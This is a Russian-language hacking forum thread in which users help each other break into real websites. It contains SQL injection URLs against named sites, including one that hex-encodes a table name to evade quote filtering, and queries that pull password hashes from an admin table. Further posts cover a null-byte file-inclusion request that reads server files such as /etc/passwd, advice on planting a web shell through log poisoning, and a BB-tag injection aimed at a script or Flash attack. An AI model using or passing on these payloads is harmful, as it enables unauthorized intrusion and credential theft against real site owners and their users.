для начала попробуй так: Code: 1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')-- но скорее всего так: Code: 1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qwerty')+from+admin)-- в таком случае твой хеш это то что будет идти до qwerty
1. да причем здесь твой аккаунт имелось ввиду логин который ты получил через скулю... 2. тогда так попробуй (и чтоб вопросов не возникло смотри п.1): Code: 1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qw erty')+from+admin where Login='логин который ты получил')-- хотя точно тебе никто нескажет... остается угадывать, вот если б ты линк дал со скулей, тогда бы помогли скорее всего
значит первое значение passhash пустое... пробуй следующий логин... ЗЫ кстати тут convert() наверное не нужен ЗЗЫ Еслиб линк бы сразу дал, меньше бы флуда было ЗЗЗЫ Или в асю мне стучи... посмотрим че там...
Доброго дня) Возникла проблема с заливкой шела в движке Insart.Content Имеется полный доступ к админке, есть возможность загрузки любых файлов, в том числе и *.php. Но, система отказывается выполнять код, а просто выводит его на экран => не полчается запустить шелл. Двиг на asp. Ссылку на загруженный шел формирует вида: getfile.asp?id={3AC9A519-4730-4C84-81AB-8A59A69A3F0C} Какие могут быть пути решения данной проблемы?
У меня вопрос таков... На кое каком движке я обнаружел что ббтэг не соовсем написан правельно,и поэтому можно что то намутить. Поскольку я не спец,то решил посоветоватся тут. тэг [mp3]тут ссылка на файл[/mp3] возможно ставить любую ссылку,тоесть без начало http:// и без конца .mp3 . К примеру Code: [mp3]http://address.com/shell.php?hack=now[/mp3] в результате в коде сайта это выглядит так HTML: <embed autostart="false" loop="false" controller="true" width="220" height="42" src=http://address.com/shell.php?hack=http://address.com/shell.php?hack=now></embed> Ну а теперь вопрос,что можно с этим сделать ? P.S: все различные ковычки ( ' " < >) он фильтрует. но можно обойти ещё и через flash файлы. работает а так же ббтэг [swf]ссылка[/swf] . Где можно достать гид по созданию flash атаки,что бы работал с javascript .
Query failed: Table 'mobolan.config' doesn't exist оно само прописует mobolan, таблица конфиг точно есть!!!
на запрос логина админа сервер выдал мне: Code: 4Ruket&ebUSPaPhAf#stUchUthE4EBU+AVEq_dravEbREk$Zud#trat$us?EcaqE а на пароль: Code: az#NAf7A!uw9e&h#cHANej_pr*hupr-yaChe@$u!uthUthesabatRuQEq+4r&crU& Первый раз с этим столкнулся, вопрос, что ЭТО?
Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00 Выводится пустая страница только когда я пробую открыть сам индекс через него же. Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы - 1 Возможно ли потянуть исходники пхп файлов? 2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav? 3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша? 4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику? 5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе? Буду оч признателен за подсказку.
Ничего странного, если, предположим, в index.php код <?php include $ctr; ?> , то результат вполне ожидаем. 1. нет, если они с расширением php, с другими расширениями должно заинклудиться. 2. как правило, нет. можно конечно написать эксплоит для этого инклуда, который будет брутить имена файлов, но это глупо. 3. зависит от сервера. я бы порекомендовал залить шелл, почитав error.log (о том, как это сделать, читай на форуме). ну и конфиг апача (httpd.conf) 4. ... 5. смотри статью Единички "У природы нет плохой погоды", а также ищи на форуме.
http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFROMATION_SCHEMA.COLUMNS+where+table_name=main_users+limit+1,1/* почему?? SELECT command denied to user 'u23390'@'10.10.223.240' for table 'COLUMNS'
1) Ты ошибся, смотри ты написал INFROMATION_SCHEMA.COLUMNS, а надо INFORMATION_SCHEMA.COLUMNS 2) Делать надо не так: table_name=main_users, а так: table_name='main_users', т.е. писать в кавычках. 3) Но здесь кавычки фильтруются, но это легко обойти, написав название таблицы в хексах: 0x6d61696e5f7573657273 В итоге должно выглядить так: Code: http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=0x6d61696e5f7573657273+limit+0,1/* P.S. Эта инъекция уже выкладывалась, юзай антибоян: http://antiboyansql.narod.ru/sql.txt
?id=2+union+select+table_name,2,3,4+from+INFORMATION_SCHEMA.TABLES/* получаю Query failed : SELECT command denied to user 'metropo3_donban' helpppp
Ну и че? чуть-чуть аглицкого заподло изучить?... не имеешь ты права такой запрос к БД использовать, отключена возможность, и такое бывает... а че ты хотел? (наверное бесплатный хостинг)
Как обычно тему удалили. Здорово вообще. Есть скуль на неро, вот линк http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/* юнион не пашет и пишет что ошибка в sql запросе хотя почему то group by нормально работает. Посмотрите скуль, скажите своё мнение.
И правда, версия MySQL 3.* Запрос, подтверждающий это: Code: http://www.nero.com/eng/showpress.php?id=100+and+substring(version(),1,1)=3
А как же тогда данные из базы выуживать без union, это же обьединение а если его нет то как достать данные то, таблиц то мы не знаем да и information_schema.tables тут и не пахнет конечно же. Я с мускулом 3 версии ниразу не работал. Как быть тогда?
Ничего из него не вытащить, максимум можно узнать название базы данных, пользователя и ещё несколько системных переменных... К сржалению всё
это blind sql-inject читай есть на форуме.. например тут http://forum.antichat.ru/thread19844.html http://forum.antichat.ru/showpost.php?p=407227&postcount=3 ну и конечно тут http://www.securitylab.ru/contest/212099.php?
